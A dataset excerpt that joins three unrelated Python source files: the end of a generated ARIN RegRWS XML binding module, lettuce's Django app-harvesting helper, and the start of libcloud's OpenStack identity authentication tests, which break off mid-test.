def export(self, outfile, level, namespace_='v1:', name_='pocLinkRef', namespacedef_='', pretty_print=True):
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
showIndent(outfile, level, pretty_print)
outfile.write('<%s%s%s' % (namespace_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = set()
self.exportAttributes(outfile, level, already_processed, namespace_, name_='pocLinkRef')
if self.hasContent_():
outfile.write('>%s' % (eol_, ))
self.exportChildren(outfile, level + 1, namespace_, name_, pretty_print=pretty_print)
outfile.write('</%s%s>%s' % (namespace_, name_, eol_))
else:
outfile.write('/>%s' % (eol_, ))
def exportAttributes(self, outfile, level, already_processed, namespace_='v1:', name_='pocLinkRef'):
if self.function is not None and 'function' not in already_processed:
already_processed.add('function')
outfile.write(' function=%s' % (self.gds_format_string(quote_attrib(self.function).encode(ExternalEncoding), input_name='function'), ))
if self.handle is not None and 'handle' not in already_processed:
already_processed.add('handle')
outfile.write(' handle=%s' % (self.gds_format_string(quote_attrib(self.handle).encode(ExternalEncoding), input_name='handle'), ))
if self.description is not None and 'description' not in already_processed:
already_processed.add('description')
outfile.write(' description=%s' % (self.gds_format_string(quote_attrib(self.description).encode(ExternalEncoding), input_name='description'), ))
def exportChildren(self, outfile, level, namespace_='v1:', name_='pocLinkRef', fromsubclass_=False, pretty_print=True):
pass
def exportLiteral(self, outfile, level, name_='pocLinkRef'):
level += 1
already_processed = set()
self.exportLiteralAttributes(outfile, level, already_processed, name_)
if self.hasContent_():
self.exportLiteralChildren(outfile, level, name_)
def exportLiteralAttributes(self, outfile, level, already_processed, name_):
if self.function is not None and 'function' not in already_processed:
already_processed.add('function')
showIndent(outfile, level)
outfile.write('function="%s",\n' % (self.function,))
if self.handle is not None and 'handle' not in already_processed:
already_processed.add('handle')
showIndent(outfile, level)
outfile.write('handle="%s",\n' % (self.handle,))
if self.description is not None and 'description' not in already_processed:
already_processed.add('description')
showIndent(outfile, level)
outfile.write('description="%s",\n' % (self.description,))
def exportLiteralChildren(self, outfile, level, name_):
pass
def build(self, node):
already_processed = set()
self.buildAttributes(node, node.attrib, already_processed)
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_)
def buildAttributes(self, node, attrs, already_processed):
value = find_attr_value_('function', node)
if value is not None and 'function' not in already_processed:
already_processed.add('function')
self.function = value
value = find_attr_value_('handle', node)
if value is not None and 'handle' not in already_processed:
already_processed.add('handle')
self.handle = value
value = find_attr_value_('description', node)
if value is not None and 'description' not in already_processed:
already_processed.add('description')
self.description = value
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
pass
# end class pocLinkRef
class iso3166_1(GeneratedsSuper):
subclass = None
superclass = None
def __init__(self, code2=None, code3=None, name=None, e164=None, anytypeobjs_=None):
if code2 is None:
self.code2 = []
else:
self.code2 = code2
if code3 is None:
self.code3 = []
else:
self.code3 = code3
if name is None:
self.name = []
else:
self.name = name
if e164 is None:
self.e164 = []
else:
self.e164 = e164
self.anytypeobjs_ = anytypeobjs_
def factory(*args_, **kwargs_):
if iso3166_1.subclass:
return iso3166_1.subclass(*args_, **kwargs_)
else:
return iso3166_1(*args_, **kwargs_)
factory = staticmethod(factory)
def get_code2(self): return self.code2
def set_code2(self, code2): self.code2 = code2
def add_code2(self, value): self.code2.append(value)
def insert_code2(self, index, value): self.code2[index] = value
def get_code3(self): return self.code3
def set_code3(self, code3): self.code3 = code3
def add_code3(self, value): self.code3.append(value)
def insert_code3(self, index, value): self.code3[index] = value
def get_name(self): return self.name
def set_name(self, name): self.name = name
def add_name(self, value): self.name.append(value)
def insert_name(self, index, value): self.name[index] = value
def get_e164(self): return self.e164
def set_e164(self, e164): self.e164 = e164
def add_e164(self, value): self.e164.append(value)
def insert_e164(self, index, value): self.e164[index] = value
def get_anytypeobjs_(self): return self.anytypeobjs_
def set_anytypeobjs_(self, anytypeobjs_): self.anytypeobjs_ = anytypeobjs_
def hasContent_(self):
if (
self.code2 or
self.code3 or
self.name or
self.e164 or
self.anytypeobjs_ is not None
):
return True
else:
return False
def export(self, outfile, level, namespace_='v1:', name_='iso3166-1', namespacedef_='', pretty_print=True):
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
showIndent(outfile, level, pretty_print)
outfile.write('<%s%s%s' % (namespace_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = set()
self.exportAttributes(outfile, level, already_processed, namespace_, name_='iso3166-1')
if self.hasContent_():
outfile.write('>%s' % (eol_, ))
self.exportChildren(outfile, level + 1, namespace_, name_, pretty_print=pretty_print)
showIndent(outfile, level, pretty_print)
outfile.write('</%s%s>%s' % (namespace_, name_, eol_))
else:
outfile.write('/>%s' % (eol_, ))
def exportAttributes(self, outfile, level, already_processed, namespace_='v1:', name_='iso3166-1'):
pass
def exportChildren(self, outfile, level, namespace_='v1:', name_='iso3166-1', fromsubclass_=False, pretty_print=True):
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
for code2_ in self.code2:
showIndent(outfile, level, pretty_print)
outfile.write('<%scode2>%s</%scode2>%s' % (namespace_, self.gds_format_string(quote_xml(code2_).encode(ExternalEncoding), input_name='code2'), namespace_, eol_))
for code3_ in self.code3:
showIndent(outfile, level, pretty_print)
outfile.write('<%scode3>%s</%scode3>%s' % (namespace_, self.gds_format_string(quote_xml(code3_).encode(ExternalEncoding), input_name='code3'), namespace_, eol_))
for name_ in self.name:
showIndent(outfile, level, pretty_print)
outfile.write('<%sname>%s</%sname>%s' % (namespace_, self.gds_format_string(quote_xml(name_).encode(ExternalEncoding), input_name='name'), namespace_, eol_))
for e164_ in self.e164:
showIndent(outfile, level, pretty_print)
outfile.write('<%se164>%s</%se164>%s' % (namespace_, self.gds_format_string(quote_xml(e164_).encode(ExternalEncoding), input_name='e164'), namespace_, eol_))
if self.anytypeobjs_ is not None:
self.anytypeobjs_.export(outfile, level, namespace_, pretty_print=pretty_print)
def exportLiteral(self, outfile, level, name_='iso3166-1'):
level += 1
already_processed = set()
self.exportLiteralAttributes(outfile, level, already_processed, name_)
if self.hasContent_():
self.exportLiteralChildren(outfile, level, name_)
def exportLiteralAttributes(self, outfile, level, already_processed, name_):
pass
def exportLiteralChildren(self, outfile, level, name_):
showIndent(outfile, level)
outfile.write('code2=[\n')
level += 1
for code2_ in self.code2:
showIndent(outfile, level)
outfile.write('%s,\n' % quote_python(code2_).encode(ExternalEncoding))
level -= 1
showIndent(outfile, level)
outfile.write('],\n')
showIndent(outfile, level)
outfile.write('code3=[\n')
level += 1
for code3_ in self.code3:
showIndent(outfile, level)
outfile.write('%s,\n' % quote_python(code3_).encode(ExternalEncoding))
level -= 1
showIndent(outfile, level)
outfile.write('],\n')
showIndent(outfile, level)
outfile.write('name=[\n')
level += 1
for name_ in self.name:
showIndent(outfile, level)
outfile.write('%s,\n' % quote_python(name_).encode(ExternalEncoding))
level -= 1
showIndent(outfile, level)
outfile.write('],\n')
showIndent(outfile, level)
outfile.write('e164=[\n')
level += 1
for e164_ in self.e164:
showIndent(outfile, level)
outfile.write('%s,\n' % quote_python(e164_).encode(ExternalEncoding))
level -= 1
showIndent(outfile, level)
outfile.write('],\n')
if self.anytypeobjs_ is not None:
showIndent(outfile, level)
outfile.write('anytypeobjs_=model_.anytypeobjs_(\n')
self.anytypeobjs_.exportLiteral(outfile, level)
showIndent(outfile, level)
outfile.write('),\n')
def build(self, node):
already_processed = set()
self.buildAttributes(node, node.attrib, already_processed)
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_)
def buildAttributes(self, node, attrs, already_processed):
pass
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
if nodeName_ == 'code2':
code2_ = child_.text
code2_ = self.gds_validate_string(code2_, node, 'code2')
self.code2.append(code2_)
elif nodeName_ == 'code3':
code3_ = child_.text
code3_ = self.gds_validate_string(code3_, node, 'code3')
self.code3.append(code3_)
elif nodeName_ == 'name':
name_ = child_.text
name_ = self.gds_validate_string(name_, node, 'name')
self.name.append(name_)
elif nodeName_ == 'e164':
e164_ = child_.text
e164_ = self.gds_validate_string(e164_, node, 'e164')
self.e164.append(e164_)
else:
obj_ = self.gds_build_any(child_, 'iso3166-1')
if obj_ is not None:
self.set_anytypeobjs_(obj_)
# end class iso3166_1
class pocLinks(GeneratedsSuper):
subclass = None
superclass = None
def __init__(self, pocLinkRef=None):
if pocLinkRef is None:
self.pocLinkRef = []
else:
self.pocLinkRef = pocLinkRef
def factory(*args_, **kwargs_):
if pocLinks.subclass:
return pocLinks.subclass(*args_, **kwargs_)
else:
return pocLinks(*args_, **kwargs_)
factory = staticmethod(factory)
def get_pocLinkRef(self): return self.pocLinkRef
def set_pocLinkRef(self, pocLinkRef): self.pocLinkRef = pocLinkRef
def add_pocLinkRef(self, value): self.pocLinkRef.append(value)
def insert_pocLinkRef(self, index, value): self.pocLinkRef[index] = value
def hasContent_(self):
if (
self.pocLinkRef
):
return True
else:
return False
def export(self, outfile, level, namespace_='v1:', name_='pocLinks', namespacedef_='', pretty_print=True):
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
showIndent(outfile, level, pretty_print)
outfile.write('<%s%s%s' % (namespace_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = set()
self.exportAttributes(outfile, level, already_processed, namespace_, name_='pocLinks')
if self.hasContent_():
outfile.write('>%s' % (eol_, ))
self.exportChildren(outfile, level + 1, namespace_, name_, pretty_print=pretty_print)
showIndent(outfile, level, pretty_print)
outfile.write('</%s%s>%s' % (namespace_, name_, eol_))
else:
outfile.write('/>%s' % (eol_, ))
def exportAttributes(self, outfile, level, already_processed, namespace_='v1:', name_='pocLinks'):
pass
def exportChildren(self, outfile, level, namespace_='v1:', name_='pocLinks', fromsubclass_=False, pretty_print=True):
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
for pocLinkRef_ in self.pocLinkRef:
pocLinkRef_.export(outfile, level, namespace_, name_='pocLinkRef', pretty_print=pretty_print)
def exportLiteral(self, outfile, level, name_='pocLinks'):
level += 1
already_processed = set()
self.exportLiteralAttributes(outfile, level, already_processed, name_)
if self.hasContent_():
self.exportLiteralChildren(outfile, level, name_)
def exportLiteralAttributes(self, outfile, level, already_processed, name_):
pass
def exportLiteralChildren(self, outfile, level, name_):
showIndent(outfile, level)
outfile.write('pocLinkRef=[\n')
level += 1
for pocLinkRef_ in self.pocLinkRef:
showIndent(outfile, level)
outfile.write('model_.pocLinkRef(\n')
pocLinkRef_.exportLiteral(outfile, level)
showIndent(outfile, level)
outfile.write('),\n')
level -= 1
showIndent(outfile, level)
outfile.write('],\n')
def build(self, node):
already_processed = set()
self.buildAttributes(node, node.attrib, already_processed)
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_)
def buildAttributes(self, node, attrs, already_processed):
pass
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
if nodeName_ == 'pocLinkRef':
obj_ = pocLinkRef.factory()
obj_.build(child_)
self.pocLinkRef.append(obj_)
# end class pocLinks
class comment(GeneratedsSuper):
subclass = None
superclass = None
def __init__(self, line=None):
if line is None:
self.line = []
else:
self.line = line
def factory(*args_, **kwargs_):
if comment.subclass:
return comment.subclass(*args_, **kwargs_)
else:
return comment(*args_, **kwargs_)
factory = staticmethod(factory)
def get_line(self): return self.line
def set_line(self, line): self.line = line
def add_line(self, value): self.line.append(value)
def insert_line(self, index, value): self.line[index] = value
def hasContent_(self):
if (
self.line
):
return True
else:
return False
def export(self, outfile, level, namespace_='v1:', name_='comment', namespacedef_='', pretty_print=True):
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
showIndent(outfile, level, pretty_print)
outfile.write('<%s%s%s' % (namespace_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = set()
self.exportAttributes(outfile, level, already_processed, namespace_, name_='comment')
if self.hasContent_():
outfile.write('>%s' % (eol_, ))
self.exportChildren(outfile, level + 1, namespace_, name_, pretty_print=pretty_print)
showIndent(outfile, level, pretty_print)
outfile.write('</%s%s>%s' % (namespace_, name_, eol_))
else:
outfile.write('/>%s' % (eol_, ))
def exportAttributes(self, outfile, level, already_processed, namespace_='v1:', name_='comment'):
pass
def exportChildren(self, outfile, level, namespace_='v1:', name_='comment', fromsubclass_=False, pretty_print=True):
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
for line_ in self.line:
line_.export(outfile, level, namespace_, name_='line', pretty_print=pretty_print)
def exportLiteral(self, outfile, level, name_='comment'):
level += 1
already_processed = set()
self.exportLiteralAttributes(outfile, level, already_processed, name_)
if self.hasContent_():
self.exportLiteralChildren(outfile, level, name_)
def exportLiteralAttributes(self, outfile, level, already_processed, name_):
pass
def exportLiteralChildren(self, outfile, level, name_):
showIndent(outfile, level)
outfile.write('line=[\n')
level += 1
for line_ in self.line:
showIndent(outfile, level)
outfile.write('model_.line(\n')
line_.exportLiteral(outfile, level)
showIndent(outfile, level)
outfile.write('),\n')
level -= 1
showIndent(outfile, level)
outfile.write('],\n')
def build(self, node):
already_processed = set()
self.buildAttributes(node, node.attrib, already_processed)
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_)
def buildAttributes(self, node, attrs, already_processed):
pass
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
if nodeName_ == 'line':
obj_ = line.factory()
obj_.build(child_)
self.line.append(obj_)
# end class comment
class streetAddress(GeneratedsSuper):
subclass = None
superclass = None
def __init__(self, line=None):
if line is None:
self.line = []
else:
self.line = line
def factory(*args_, **kwargs_):
if streetAddress.subclass:
return streetAddress.subclass(*args_, **kwargs_)
else:
return streetAddress(*args_, **kwargs_)
factory = staticmethod(factory)
def get_line(self): return self.line
def set_line(self, line): self.line = line
def add_line(self, value): self.line.append(value)
def insert_line(self, index, value): self.line[index] = value
def hasContent_(self):
if (
self.line
):
return True
else:
return False
def export(self, outfile, level, namespace_='v1:', name_='streetAddress', namespacedef_='', pretty_print=True):
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
showIndent(outfile, level, pretty_print)
outfile.write('<%s%s%s' % (namespace_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = set()
self.exportAttributes(outfile, level, already_processed, namespace_, name_='streetAddress')
if self.hasContent_():
outfile.write('>%s' % (eol_, ))
self.exportChildren(outfile, level + 1, namespace_, name_, pretty_print=pretty_print)
showIndent(outfile, level, pretty_print)
outfile.write('</%s%s>%s' % (namespace_, name_, eol_))
else:
outfile.write('/>%s' % (eol_, ))
def exportAttributes(self, outfile, level, already_processed, namespace_='v1:', name_='streetAddress'):
pass
def exportChildren(self, outfile, level, namespace_='v1:', name_='streetAddress', fromsubclass_=False, pretty_print=True):
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
for line_ in self.line:
line_.export(outfile, level, namespace_, name_='line', pretty_print=pretty_print)
def exportLiteral(self, outfile, level, name_='streetAddress'):
level += 1
already_processed = set()
self.exportLiteralAttributes(outfile, level, already_processed, name_)
if self.hasContent_():
self.exportLiteralChildren(outfile, level, name_)
def exportLiteralAttributes(self, outfile, level, already_processed, name_):
pass
def exportLiteralChildren(self, outfile, level, name_):
showIndent(outfile, level)
outfile.write('line=[\n')
level += 1
for line_ in self.line:
showIndent(outfile, level)
outfile.write('model_.line(\n')
line_.exportLiteral(outfile, level)
showIndent(outfile, level)
outfile.write('),\n')
level -= 1
showIndent(outfile, level)
outfile.write('],\n')
def build(self, node):
already_processed = set()
self.buildAttributes(node, node.attrib, already_processed)
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_)
def buildAttributes(self, node, attrs, already_processed):
pass
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
if nodeName_ == 'line':
obj_ = line.factory()
obj_.build(child_)
self.line.append(obj_)
# end class streetAddress
class line(GeneratedsSuper):
subclass = None
superclass = None
def __init__(self, number=None, valueOf_=None):
self.number = _cast(int, number)
self.valueOf_ = valueOf_
def factory(*args_, **kwargs_):
if line.subclass:
return line.subclass(*args_, **kwargs_)
else:
return line(*args_, **kwargs_)
factory = staticmethod(factory)
def get_number(self): return self.number
def set_number(self, number): self.number = number
def get_valueOf_(self): return self.valueOf_
def set_valueOf_(self, valueOf_): self.valueOf_ = valueOf_
def hasContent_(self):
if (
self.valueOf_
):
return True
else:
return False
def export(self, outfile, level, namespace_='v1:', name_='line', namespacedef_='', pretty_print=True):
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
showIndent(outfile, level, pretty_print)
outfile.write('<%s%s%s' % (namespace_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = set()
self.exportAttributes(outfile, level, already_processed, namespace_, name_='line')
if self.hasContent_():
outfile.write('>')
outfile.write(str(self.valueOf_).encode(ExternalEncoding))
self.exportChildren(outfile, level + 1, namespace_, name_, pretty_print=pretty_print)
outfile.write('</%s%s>%s' % (namespace_, name_, eol_))
else:
outfile.write('/>%s' % (eol_, ))
def exportAttributes(self, outfile, level, already_processed, namespace_='v1:', name_='line'):
if self.number is not None and 'number' not in already_processed:
already_processed.add('number')
outfile.write(' number="%s"' % self.gds_format_integer(self.number, input_name='number'))
def exportChildren(self, outfile, level, namespace_='v1:', name_='line', fromsubclass_=False, pretty_print=True):
pass
def exportLiteral(self, outfile, level, name_='line'):
level += 1
already_processed = set()
self.exportLiteralAttributes(outfile, level, already_processed, name_)
if self.hasContent_():
self.exportLiteralChildren(outfile, level, name_)
showIndent(outfile, level)
outfile.write('valueOf_ = """%s""",\n' % (self.valueOf_,))
def exportLiteralAttributes(self, outfile, level, already_processed, name_):
if self.number is not None and 'number' not in already_processed:
already_processed.add('number')
showIndent(outfile, level)
outfile.write('number=%d,\n' % (self.number,))
def exportLiteralChildren(self, outfile, level, name_):
pass
def build(self, node):
already_processed = set()
self.buildAttributes(node, node.attrib, already_processed)
self.valueOf_ = get_all_text_(node)
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_)
def buildAttributes(self, node, attrs, already_processed):
value = find_attr_value_('number', node)
if value is not None and 'number' not in already_processed:
already_processed.add('number')
try:
self.number = int(value)
except ValueError, exp:
raise_parse_error(node, 'Bad integer attribute: %s' % exp)
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
pass
# end class line
GDSClassesMapping = {
}
USAGE_TEXT = """
Usage: python <Parser>.py <in_xml_file>
"""
def usage():
print USAGE_TEXT
sys.exit(1)
def get_root_tag(node):
tag = Tag_pattern_.match(node.tag).groups()[-1]
rootClass = GDSClassesMapping.get(tag)
if rootClass is None:
rootClass = globals().get(tag)
return tag, rootClass
def parse(inFileName):
doc = parsexml_(inFileName)
rootNode = doc.getroot()
rootTag, rootClass = get_root_tag(rootNode)
if rootClass is None:
rootTag = 'org'
rootClass = org
rootObj = rootClass.factory()
rootObj.build(rootNode)
# Enable Python to collect the space used by the DOM.
doc = None
sys.stdout.write('<?xml version="1.0" ?>\n')
rootObj.export(
sys.stdout, 0, name_=rootTag,
namespacedef_='xmlns="http://www.arin.net/regrws/core/v1"',
pretty_print=True)
return rootObj
def parseEtree(inFileName):
doc = parsexml_(inFileName)
rootNode = doc.getroot()
rootTag, rootClass = get_root_tag(rootNode)
if rootClass is None:
rootTag = 'org'
rootClass = org
rootObj = rootClass.factory()
rootObj.build(rootNode)
# Enable Python to collect the space used by the DOM.
doc = None
mapping = {}
rootElement = rootObj.to_etree(None, name_=rootTag, mapping_=mapping)
reverse_mapping = rootObj.gds_reverse_node_mapping(mapping)
content = etree_.tostring(
rootElement, pretty_print=True,
xml_declaration=True, encoding="utf-8")
sys.stdout.write(content)
sys.stdout.write('\n')
return rootObj, rootElement, mapping, reverse_mapping
def parseString(inString):
from StringIO import StringIO
doc = parsexml_(StringIO(inString))
rootNode = doc.getroot()
roots = get_root_tag(rootNode)
rootClass = roots[1]
if rootClass is None:
rootClass = org
rootObj = rootClass.factory()
rootObj.build(rootNode)
# Enable Python to collect the space used by the DOM.
doc = None
sys.stdout.write('<?xml version="1.0" ?>\n')
rootObj.export(
sys.stdout, 0, name_="org",
namespacedef_='xmlns="http://www.arin.net/regrws/core/v1"')
return rootObj
def parseLiteral(inFileName):
doc = parsexml_(inFileName)
rootNode = doc.getroot()
rootTag, rootClass = get_root_tag(rootNode)
if rootClass is None:
rootTag = 'org'
rootClass = org
rootObj = rootClass.factory()
rootObj.build(rootNode)
# Enable Python to collect the space used by the DOM.
doc = None
sys.stdout.write('#from OrgPayload import *\n\n')
sys.stdout.write('import OrgPayload as model_\n\n')
sys.stdout.write('rootObj = model_.rootTag(\n')
rootObj.exportLiteral(sys.stdout, 0, name_=rootTag)
sys.stdout.write(')\n')
return rootObj
def main():
args = sys.argv[1:]
if len(args) == 1:
parse(args[0])
else:
usage()
if __name__ == '__main__':
#import pdb; pdb.set_trace()
main()
__all__ = [
"comment",
"iso3166_1",
"line",
"org",
"pocLinkRef",
"pocLinks",
"streetAddress"
]
| mit | -2,681,568,108,049,449,500 | 40.330508 | 240 | 0.573003 | false |
devs1991/test_edx_docmode | venv/lib/python2.7/site-packages/lettuce/django/apps.py | 1 | 3009 | # -*- coding: utf-8 -*-
# <Lettuce - Behaviour Driven Development for python>
# Copyright (C) <2010-2012> Gabriel Falcão <gabriel@nacaolivre.org>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
from os.path import join, dirname
try:
from importlib import import_module
except ImportError:
from django.utils.importlib import import_module
from django.apps import apps as django_apps
from django.conf import settings
def _filter_bultins(module):
"returns only those apps that are not builtin django.contrib"
name = module.__name__
return not name.startswith("django.contrib") and name != 'lettuce.django'
def _filter_configured_apps(module):
"returns only those apps that are in django.conf.settings.LETTUCE_APPS"
app_found = True
if hasattr(settings, 'LETTUCE_APPS') and isinstance(settings.LETTUCE_APPS, tuple):
app_found = False
for appname in settings.LETTUCE_APPS:
if module.__name__.startswith(appname):
app_found = True
return app_found
def _filter_configured_avoids(module):
"returns apps that are not within django.conf.settings.LETTUCE_AVOID_APPS"
run_app = False
if hasattr(settings, 'LETTUCE_AVOID_APPS') and isinstance(settings.LETTUCE_AVOID_APPS, tuple):
for appname in settings.LETTUCE_AVOID_APPS:
if module.__name__.startswith(appname):
run_app = True
return not run_app
def get_apps():
return [app_cfg.module for app_cfg in django_apps.get_app_configs()]
def harvest_lettuces(only_the_apps=None, avoid_apps=None, path="features"):
"""gets all installed apps that are not from django.contrib
returns a list of tuples with (path_to_app, app_module)
"""
apps = get_apps()
if isinstance(only_the_apps, tuple) and any(only_the_apps):
def _filter_only_specified(module):
return module.__name__ in only_the_apps
apps = filter(_filter_only_specified, apps)
else:
apps = filter(_filter_bultins, apps)
apps = filter(_filter_configured_apps, apps)
apps = filter(_filter_configured_avoids, apps)
if isinstance(avoid_apps, tuple) and any(avoid_apps):
def _filter_avoid(module):
return module.__name__ not in avoid_apps
apps = filter(_filter_avoid, apps)
joinpath = lambda app: (join(dirname(app.__file__), path), app)
return map(joinpath, apps)
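# A minimal usage sketch. The app labels and paths below are made-up examples,
# not part of lettuce itself:
#
#     # settings.py
#     LETTUCE_APPS = ('blog', 'shop')           # harvest features only from these apps
#     LETTUCE_AVOID_APPS = ('shop.payments',)   # ...skipping anything under this prefix
#
#     # harvesting
#     for features_dir, app_module in harvest_lettuces(path='features'):
#         print features_dir                    # e.g. '/srv/project/blog/features'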
| agpl-3.0 | -8,298,065,788,740,383,000 | 34.388235 | 98 | 0.691822 | false |
Scalr/libcloud | libcloud/test/common/test_openstack_identity.py | 1 | 37442 | # Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import sys
import datetime
try:
import simplejson as json
except ImportError:
import json
from mock import Mock
from libcloud.utils.py3 import httplib
from libcloud.common.openstack import OpenStackBaseConnection
from libcloud.common.openstack_identity import AUTH_TOKEN_EXPIRES_GRACE_SECONDS
from libcloud.common.openstack_identity import get_class_for_auth_version
from libcloud.common.openstack_identity import OpenStackServiceCatalog
from libcloud.common.openstack_identity import OpenStackIdentity_2_0_Connection
from libcloud.common.openstack_identity import OpenStackIdentity_3_0_Connection
from libcloud.common.openstack_identity import OpenStackIdentity_3_0_Connection_OIDC_access_token
from libcloud.common.openstack_identity import OpenStackIdentityUser
from libcloud.compute.drivers.openstack import OpenStack_1_0_NodeDriver
from libcloud.common.openstack_identity import OpenStackIdentity_2_0_Connection_VOMS
from libcloud.test import unittest
from libcloud.test import MockHttp
from libcloud.test.secrets import OPENSTACK_PARAMS
from libcloud.test.file_fixtures import ComputeFileFixtures
from libcloud.test.compute.test_openstack import OpenStackMockHttp
from libcloud.test.compute.test_openstack import OpenStack_2_0_MockHttp
class OpenStackIdentityConnectionTestCase(unittest.TestCase):
def setUp(self):
OpenStackBaseConnection.auth_url = None
OpenStackBaseConnection.conn_class = OpenStackMockHttp
def test_auth_url_is_correctly_assembled(self):
tuples = [
('1.0', OpenStackMockHttp),
('1.1', OpenStackMockHttp),
('2.0', OpenStack_2_0_MockHttp),
('2.0_apikey', OpenStack_2_0_MockHttp),
('2.0_password', OpenStack_2_0_MockHttp)
]
APPEND = 0
NOTAPPEND = 1
auth_urls = [
('https://auth.api.example.com', APPEND, ''),
('https://auth.api.example.com/', NOTAPPEND, '/'),
('https://auth.api.example.com/foo/bar', NOTAPPEND, '/foo/bar'),
('https://auth.api.example.com/foo/bar/', NOTAPPEND, '/foo/bar/')
]
actions = {
'1.0': '/v1.0',
'1.1': '/v1.1/auth',
'2.0': '/v2.0/tokens',
'2.0_apikey': '/v2.0/tokens',
'2.0_password': '/v2.0/tokens'
}
user_id = OPENSTACK_PARAMS[0]
key = OPENSTACK_PARAMS[1]
for (auth_version, mock_http_class) in tuples:
for (url, should_append_default_path, expected_path) in auth_urls:
connection = \
self._get_mock_connection(mock_http_class=mock_http_class,
auth_url=url)
auth_url = connection.auth_url
cls = get_class_for_auth_version(auth_version=auth_version)
osa = cls(auth_url=auth_url,
user_id=user_id,
key=key,
parent_conn=connection)
try:
osa = osa.authenticate()
except:
pass
if (should_append_default_path == APPEND):
expected_path = actions[auth_version]
self.assertEqual(osa.action, expected_path)
def test_basic_authentication(self):
tuples = [
('1.0', OpenStackMockHttp),
('1.1', OpenStackMockHttp),
('2.0', OpenStack_2_0_MockHttp),
('2.0_apikey', OpenStack_2_0_MockHttp),
('2.0_password', OpenStack_2_0_MockHttp)
]
user_id = OPENSTACK_PARAMS[0]
key = OPENSTACK_PARAMS[1]
for (auth_version, mock_http_class) in tuples:
connection = \
self._get_mock_connection(mock_http_class=mock_http_class)
auth_url = connection.auth_url
cls = get_class_for_auth_version(auth_version=auth_version)
osa = cls(auth_url=auth_url, user_id=user_id, key=key,
parent_conn=connection)
self.assertEqual(osa.urls, {})
self.assertIsNone(osa.auth_token)
self.assertIsNone(osa.auth_user_info)
osa = osa.authenticate()
self.assertTrue(len(osa.urls) >= 1)
self.assertTrue(osa.auth_token is not None)
if auth_version in ['1.1', '2.0', '2.0_apikey', '2.0_password']:
self.assertTrue(osa.auth_token_expires is not None)
if auth_version in ['2.0', '2.0_apikey', '2.0_password']:
self.assertTrue(osa.auth_user_info is not None)
def test_token_expiration_and_force_reauthentication(self):
user_id = OPENSTACK_PARAMS[0]
key = OPENSTACK_PARAMS[1]
connection = self._get_mock_connection(OpenStack_2_0_MockHttp)
auth_url = connection.auth_url
yesterday = datetime.datetime.today() - datetime.timedelta(1)
tomorrow = datetime.datetime.today() + datetime.timedelta(1)
osa = OpenStackIdentity_2_0_Connection(auth_url=auth_url,
user_id=user_id,
key=key,
parent_conn=connection)
mocked_auth_method = Mock(wraps=osa._authenticate_2_0_with_body)
osa._authenticate_2_0_with_body = mocked_auth_method
# Force re-auth, expired token
osa.auth_token = None
osa.auth_token_expires = yesterday
count = 5
for i in range(0, count):
osa.authenticate(force=True)
self.assertEqual(mocked_auth_method.call_count, count)
# No force reauth, expired token
osa.auth_token = None
osa.auth_token_expires = yesterday
mocked_auth_method.call_count = 0
self.assertEqual(mocked_auth_method.call_count, 0)
for i in range(0, count):
osa.authenticate(force=False)
self.assertEqual(mocked_auth_method.call_count, 1)
# No force reauth, valid / non-expired token
osa.auth_token = None
mocked_auth_method.call_count = 0
self.assertEqual(mocked_auth_method.call_count, 0)
for i in range(0, count):
osa.authenticate(force=False)
if i == 0:
osa.auth_token_expires = tomorrow
self.assertEqual(mocked_auth_method.call_count, 1)
# No force reauth, valid / non-expired token which is about to expire in
# less than AUTH_TOKEN_EXPIRES_GRACE_SECONDS
soon = datetime.datetime.utcnow() + \
datetime.timedelta(seconds=AUTH_TOKEN_EXPIRES_GRACE_SECONDS - 1)
osa.auth_token = None
mocked_auth_method.call_count = 0
self.assertEqual(mocked_auth_method.call_count, 0)
for i in range(0, count):
if i == 0:
osa.auth_token_expires = soon
